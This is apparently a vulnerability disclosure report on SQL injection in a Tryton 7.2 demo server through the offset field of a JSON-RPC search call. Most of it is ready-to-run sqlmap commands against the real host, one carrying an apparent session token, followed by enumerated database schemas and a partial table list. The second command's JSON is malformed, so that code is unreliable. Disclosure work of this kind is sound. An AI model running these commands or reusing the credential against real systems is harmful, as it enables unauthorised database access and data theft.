SQL Injection vulnerability via offset parameter
Security Report
1. Introduction
This report outlines the findings from a security assessment of the target application demo7.2.tryton.org
. The assessment focused on identifying SQL injection vulnerabilities and evaluating the potential impact on the system.
2. Methodology
SQL Injection Vulnerability
Endpoint:
POST /demo7.2/
Parameters:
-
params
array in the JSON payload, specifically the second element.
3. Vulnerability Type
- Boolean-based blind SQL injection
- Error-based SQL injection
- Stacked queries SQL injection
- Time-based blind SQL injection
4. Exploitation Steps
A user must be logged in in order to exploit this vulnerability.
sqlmap
Automated Detection Using python3 sqlmap.py -u "https://demo7.2.tryton.org/demo7.2/" --data='{"id":38,"method":"model.party.party.search","params":[[],"0*",1000,[["distance","ASC NULLS LAST"],["name","ASC"],["id",null]],{"client":"b4930c52-51e1-4e90-ac40-42b5559e9144","company_filter":"one","company":1,"language":"en","language_direction":"ltr","groups":[7,8,20,21,16,22,24,19,12,14],"company_work_time":{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}' --method=POST --headers="Authorization: Session [session_token], Content-Type: application/json" --level=5 --risk=3 --dbs --random-agent --threads=10 --hex
Enumerate Databases
Available Databases (Schemas):
information_schema
pg_catalog
public
sudo python3 sqlmap.py -u "https://demo7.2.tryton.org/demo7.2/" --data='{"id":38,"method":"model.party.party.search","params":],"0*",1000,[["distance","ASC NULLS LAST"],["name","ASC"],["id",null,{"client":"b4930c52-51e1-4e90-ac40-42b5559e9144","company_filter":"one","company":1,"language":"en","language_direction":"ltr","groups":[7,8,20,21,16,22,24,19,12,14],"company_work_time":{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}' --method=POST --headers="Authorization: Session ZGVtbzoyOmI1MDlmZTBiYjYyZWJjYjk3ZmI5MzkxZjU2NDRiNDU0YzNkYWI0N2IxOGIxOWY3MWViNmQyMmIyMDUxYmVlOTE=, Content-Type: application/json" --level=5 --risk=3 --tables -D public --threads=10 --no-cast --random-agent
Database: public [255 tables] +-------------------------------------------------+ | account_account-account_tax | | account_account_template-account_tax_template | | account_invoice-account_move_line | | account_invoice-additional-account_move | | account_invoice_line-account_tax | | account_invoice_line-stock_move | | bank_account-party_party